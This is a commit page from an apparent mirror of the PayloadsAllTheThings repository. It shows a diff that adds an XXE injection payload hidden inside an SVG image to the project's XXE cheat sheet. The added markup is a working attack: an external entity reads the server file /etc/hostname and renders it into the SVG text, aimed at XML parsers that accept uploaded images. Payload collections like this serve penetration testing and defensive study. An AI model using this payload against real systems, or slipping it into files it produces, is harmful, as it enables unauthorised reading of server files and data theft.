ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-18 09:25:26 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #92 from Techbrunch/patch-2

Browse Source 
Add XXE payload inside SVG
This commit is contained in:
Swissky 2019-09-18 08:12:37 +02:00 committed by GitHub
commit 8061cdd856
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
XXE Injection/README.md
View File

@ -298,6 +298,14 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
</svg>
```
```
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
```
### XXE inside SOAP
```xml